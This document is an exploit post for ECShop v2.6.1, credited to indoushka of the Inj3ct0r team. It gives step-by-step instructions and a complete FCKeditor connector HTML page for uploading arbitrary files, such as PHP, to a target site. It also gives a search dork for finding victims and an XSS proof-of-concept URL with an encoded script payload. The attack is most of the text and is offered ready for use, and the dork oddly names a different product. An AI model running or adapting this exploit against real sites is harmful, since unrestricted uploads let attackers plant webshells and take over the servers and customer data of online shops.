ECShop v2.6.1 (FCKeditor Remote Upload File / XSS) Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

ECShop v2.6.1 (FCKeditor Remote Upload File / XSS) Exploit

来源：www.sec4ever.com 作者：indoushka 发布时间：2010-08-23

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __ /'__`\        /\ \__ /'__`\                   0
0 /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \ _ ___           1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0 [+] Site            : Inj3ct0r.com                                  0
1 [+] Support e-mail : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    #######################################           1
0                    I'm indoushka member from Inj3ct0r Team           1
1                    #######################################           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

# Vendor: http://www.ecshop.com/

# Date: 2010-05-27

# Author : indoushka

# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !

# Home : www.sec4ever.com

# Bug : Remote Upload File Exploit / XSS

# Tested on : windows SP2 Franзais V.(Pnx2 2.0)

# Dork : Powered By Alegro Cart

# Exploit By indoushka

1 -

[~] 1.Save code html format

[~] 2.Search Target.com

[~] 3.Edit and replace & Target

[~] 4.Save Html Page

[~] 5.Open Page Html (Edite Source)

[~] 6.Set Format PHP

[~] 7.Choose File & Upload

[~] 8.Formats can be uploaded (Html.Htm.Jpg.gif.Xml....)

[~] 9.Target.com/images/uploads/File/File Name

2 - code html format

<head>
<title>FCKeditor - Connectors Tests</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<script type="text/javascript">

// Automatically detect the correct document.domain (#1919).
(function()
{
var d = document.domain ;

while ( true )
{
// Test if we can access a parent property.
try
{
var test = window.opener.document.domain ;
break ;
}
catch( e ) {}

// Remove a domain part: www.mytest.example.com => mytest.example.com => example.com ...
d = d.replace( /.*?(?:\.|$)/, '' ) ;

if ( d.length == 0 )
break ; // It was not able to detect the domain.

try
{
document.domain = d ;
}
catch (e)
{
break ;
}
}
})() ;

function BuildBaseUrl( command )
{
var sUrl =
document.getElementById('cmbConnector').value +
'?Command=' + command +
'&Type=' + document.getElementById('cmbType').value +
'&CurrentFolder=' + encodeURIComponent(document.getElementById('txtFolder').value) ;

return sUrl ;
}

function SetFrameUrl( url )
{
document.getElementById('eRunningFrame').src = url ;

document.getElementById('eUrl').innerHTML = url ;
}

function GetFolders()
{
SetFrameUrl( BuildBaseUrl( 'GetFolders' ) ) ;
return false ;
}

function GetFoldersAndFiles()
{
SetFrameUrl( BuildBaseUrl( 'GetFoldersAndFiles' ) ) ;
return false ;
}

function CreateFolder()
{
var sFolder = prompt( 'Type the folder name:', 'Test Folder' ) ;

if ( ! sFolder )
return false ;

var sUrl = BuildBaseUrl( 'CreateFolder' ) ;
sUrl += '&NewFolderName=' + encodeURIComponent( sFolder ) ;

SetFrameUrl( sUrl ) ;
return false ;
}

function OnUploadCompleted( errorNumber, fileName )
{
switch ( errorNumber )
{
case 0 :
alert( 'File uploaded with no errors' ) ;
break ;
case 201 :
GetFoldersAndFiles() ;
alert( 'A file with the same name is already available. The uploaded file has been renamed to "' + fileName + '"' ) ;
break ;
case 202 :
alert( 'Invalid file' ) ;
break ;
default :
alert( 'Error on file upload. Error number: ' + errorNumber ) ;
break ;
}
}

this.frames.frmUpload = this ;

function SetAction()
{
var sUrl = BuildBaseUrl( 'FileUpload' ) ;
document.getElementById('eUrl').innerHTML = sUrl ;
document.getElementById('frmUpload').action = sUrl ;
}

</script>
</head>
<body>
<table height="100%" cellspacing="0" cellpadding="0" width="100%" border="0">
<tr>
<td>
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td>
Connector:<br />
<select id="cmbConnector" name="cmbConnector">
<option value="asp/connector.asp" selected="selected">ASP</option>
<option value="aspx/connector.aspx">ASP.Net</option>
<option value="cfm/connector.cfm">ColdFusion</option>
<option value="lasso/connector.lasso">Lasso</option>
<option value="perl/connector.cgi">Perl</option>
<option value="php/connector.php">PHP</option>
<option value="py/connector.py">Python</option>
</select>
</td>
<td>
   </td>
<td>
Current Folder<br />
<input id="txtFolder" type="text" value="/" name="txtFolder" /></td>
<td>
   </td>
<td>
Resource Type<br />
<select id="cmbType" name="cmbType">
<option value="File" selected="selected">File</option>
<option value="Image">Image</option>
<option value="Flash">Flash</option>
<option value="Media">Media</option>
<option value="Invalid">Invalid Type (for testing)</option>
</select>
</td>
</tr>
</table>
<br />
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td valign="top">
<a href="#" onclick="GetFolders();">Get Folders</a></td>
<td>
   </td>
<td valign="top">
<a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td>
<td>
   </td>
<td valign="top">
<a href="#" onclick="CreateFolder();">Create Folder</a></td>
<td>
   </td>
<td valign="top">
<form id="frmUpload" action="" target="eRunningFrame" method="post" enctype="multipart/form-data">
File Upload<br />
<input id="txtFileUpload" type="file" name="NewFile" />
<input type="submit" value="Upload" onclick="SetAction();" />
</form>
</td>
</tr>
</table>
<br />
URL: <span id="eUrl"></span>
</td>
</tr>
<tr>
<td height="100%" valign="top">
<iframe id="eRunningFrame" src="javascript:void(0)" name="eRunningFrame" width="100%"
height="100%"></iframe>
</td>
</tr>
</table>
</body>
</html>

2 - http://localhost:8080/search.php?encode=YToxMzp7czo4OiJjYXRlZ29yeSI7czoxOiIwIjtzOjg6ImtleXdvcmRzIjtzOjEyOiLmkanmiZjnvZfmi4kiO3M6NToiaW50cm8iO3M6Mzc6IjE%2bIj48U2NSaVB0IA0KPmFsZXJ0KDQyNTI1KTs8L1NjUmlQdD4iO3M6NToiYnJhbmQiO3M6MToiMCI7czo0OiJzb3J0IjtzOjg6Imdvb2RzX2lkIjtzOjU6Im9yZGVyIjtzOjQ6IkRFU0MiO3M6OToibWluX3ByaWNlIjtzOjE6IjAiO3M6OToibWF4X3ByaWNlIjtzOjE6IjAiO3M6NjoiYWN0aW9uIjtzOjE6IjEiO3M6MTA6Imdvb2RzX3R5cGUiO3M6MToiMCI7czo1OiJzY19kcyI7czoxOiIwIjtzOjQ6InBhZ2UiO3M6MToiMiI7czoxODoic2VhcmNoX2VuY29kZV90aW1lIjtpOjEyNzYwODcyODY7fQ==

Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
all my friend :
His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
(cr4wl3r Let the poor live ) * RoAd_KiLlEr * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te
---------------------------------------------------------------------------------------------------------------------------------

[